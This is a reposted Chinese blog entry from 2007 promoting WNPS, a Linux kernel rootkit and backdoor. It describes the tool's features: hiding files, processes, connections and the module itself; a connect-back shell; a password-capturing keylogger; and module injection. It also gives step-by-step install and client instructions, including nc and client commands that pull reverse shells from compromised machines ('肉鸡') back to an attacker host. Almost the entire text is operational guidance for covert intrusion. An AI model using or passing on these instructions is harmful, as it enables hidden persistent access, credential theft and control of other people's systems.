安全焦点::安全工具-wnps-0.26-beta2.tgz

精选转载

linkboy 2007-10-31 10:25:00 博主文章分类：信息安全管理

WNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。
　　它的意思是wnps is not poc shell，我的意图在于将它设计成一个可用于实战的linux rootkit。
　　它最初的想法来自enyelkm，我对作者的开源精神深表感激。
　　开发平台：
　　2.6.9-5.EL
　　+----------------------------------------------------------------------------------------+
　　WNPS 功能特点：
　　-=-=精简测试版只有文件隐藏，目录隐藏，网络连接隐藏，后门伪终端，传输加密这几个最基本的功能-=-=
　　1、隐藏
　　隐藏指定文件
　　隐藏文件中特定的内容
　　隐藏进程
　　动态隐藏网络连接、进程-->用过sk的都知道什么是动态隐藏
　　隐藏自身模块
　　保护相关模块、进程、文件不被跟踪
　　2、内核反弹后门
　　即使肉鸡没有开放任何TCP UDP端口并过滤icmp包，只要肉鸡让回连，我们就可以获得shell
　　跨内核平台简易安装，拿着一个wnps.ko就可以管理所有2.6内核的机器，所有要做的事情只是执行insmod wnps.ko
　　完美的伪终端支持，让你用起来更顺心
　　可以设置定时自动回连，即使你的肉鸡在内网的深处，也不用担心她跑路
　　3、键盘记录功能
　　想看看有没其他人在你的肉鸡里跳舞？这个是最好的办法，还可以通过键盘记录把别人的肉鸡给抢了，怎么抢，自己发挥想像空间吧。键盘记录功能对渗透和保护肉鸡都有相当重要的意义。键盘有两种模式，一个是密码模式，就是专门记录密码相关的了，只要触发了相关特征字符串，我们就记录下相应的内容，还有一个就是完全记录模式了，顾名思义了。
　　4、模块注射
　　比adore-ng更稳定的模块注射方式
　　5、通讯加密
　　+----------------------------------------------------------------------------------------+
　　WNPS 用法：
　　服务端使用说明：
　　在安装之前，请先修改wnps目录下的config.h！！！
　　TCP_SHELL_KEY 表示要发送的主机密码，默认为@wztshell
　　HIDE_FILE 表示我们将隐藏以HIDE_FILE字符为前缀的文件
　　HIDE_TASK 表示我们将隐藏以HIDE_TASK字符为前缀的进程
　　HIDE_STR 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串
　　HIDE_OPEN 表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
　　HIDE_CLOSE
　　主机需要能够被安装模块以及提供内核源代码。
　　make;make install
　　+----------------------------------------------------------------------------------------+
　　客户端使用说明：
　　WNPS的客户端将被设计成可以工作在linux和win平台上使用。
　　1。即可以发送tcp数据报来激活shell，又能用nc来连接服务器的某一端口来发送密码，以及
　　反弹ip和port。
　　2。使用方法简单灵活
　　注意：如果要使用nc做客户端，请先修改服务端和客户端的config.h中的
　　ENCRYPT 为0。也就是不支持传输加密的功能。
　　
　　1).在windows平台下，可以用nc作为客户端，连接肉鸡任意开放的一个端口。
　　比如：
　　./nc -vvlp 8899
　　./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。
　　(1).在本机的8899端口获得一个远程shell。
　　@wztshell:5566
　　
　　(2).在192.168.75.128的5566端口获得一个远程shell。
　　@wztshell:192.168.75.128:5566
　　
　　2).在linux平台下，即可用nc作为客户端，又可采用自带的client作为客户端，并且允许发送
　　tcp数据报来激活远程shell。
　　
　　./client
　　optinons:
　　-tcp|packet [victim port] [connect back ip] [connect back port]
　　-listen [port]
　　
　　-listen 在本地监听某一端口
　　
　　-tcp 发送tcp数据报，激活远程shell
　　为远程服务器地址，必须填写这个参数。
　　[victim port] 为远程服务器开放的端口，默认将会自动扫描常用开放的端口，在send.h里定义。
　　[connect back ip] 为你要反弹回的主机地址，默认是本机公网ip地址，必须是可以让肉鸡能够回连的地址。
　　[connect back port] 为你要反弹回的主机端口，默认为8899，在config.h里定义。
　　
　　+----------------------------------------------------------------------------+
　　你可以很灵活的来使用WNPS的client。client默认的监听端口为8899，在client/config.h中设置
　　设肉鸡ip为：192.168.75.130
　　注意：如果是要在client端所在的主机上获得远程shell，无须使用-listen选项！
　　
　　(1).在本机的8899端口上获得一个远程shell。
　　./client -tcp 192.168.75.130
　　(2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。
　　./client -tcp 192.168.75.130 22
　　
　　(3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。
　　./client -tcp 192.168.75.130 22 5566
　　
　　(4).在192.168.75.128的8899端口上获得一个远程shell。
　　先在192.168.75.128上使用：
　　./client -listen
　　
　　然后在client所在的主机上使用：
　　./client -tcp 192.168.75.130 192.168.75.128
　　
　　(5).在192.168.75.128的5566端口上获得一个远程shell。
　　./client -listen 5566
　　./client -tcp 192.168.75.130 192.168.75.128 5566
　　
　　(6).向肉鸡的22端口发送数据报，然后在192.168.75.128的5566端口上获得一个远程shell。
　　./client -listen 5566
　　./client -tcp 192.168.75.130 22 192.168.75.128 5566